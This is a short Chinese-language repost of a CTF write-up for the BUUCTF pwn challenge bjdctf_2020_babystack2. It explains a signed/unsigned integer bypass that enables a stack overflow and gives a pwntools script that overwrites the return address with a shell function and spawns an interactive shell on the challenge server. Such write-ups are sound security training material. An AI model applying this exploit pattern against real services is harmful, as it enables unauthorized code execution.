[BUUCTF-pwn]——bjdctf_2020_babystack2
生活随笔
收集整理的這篇文章主要介紹了
[BUUCTF-pwn]——bjdctf_2020_babystack2
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
[BUUCTF-pwn]——bjdctf_2020_babystack2
- 題目地址: https://buuoj.cn/challenges#bjdctf_2020_babystack2
先checksec一下
在IDA中查看一下,注意想要棧溢出,首先需要nbytes足夠大。size_t類型在標準C語言庫中,是unsigned int類型, 64位 long unsigned int。
而%d 是按照int類型讀取的,我們讀入-1。其實就相當于一個很大的數字,但是可以繞過檢查。具體可以了解下整型溢出
exploit
from pwn import * p = remote("node3.buuoj.cn",25718) shell_addr = 0x0400726 p.sendlineafter('[+]Please input the length of your name:\n','-1') p.recv() payload = '\x39'*(0x10 + 0x8) + p64(shell_addr) p.send(payload) p.interactive()總結
以上是生活随笔為你收集整理的[BUUCTF-pwn]——bjdctf_2020_babystack2的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: [BUUCTF-pwn]——jarvis
- 下一篇: [BUUCTF-pwn]——jarvis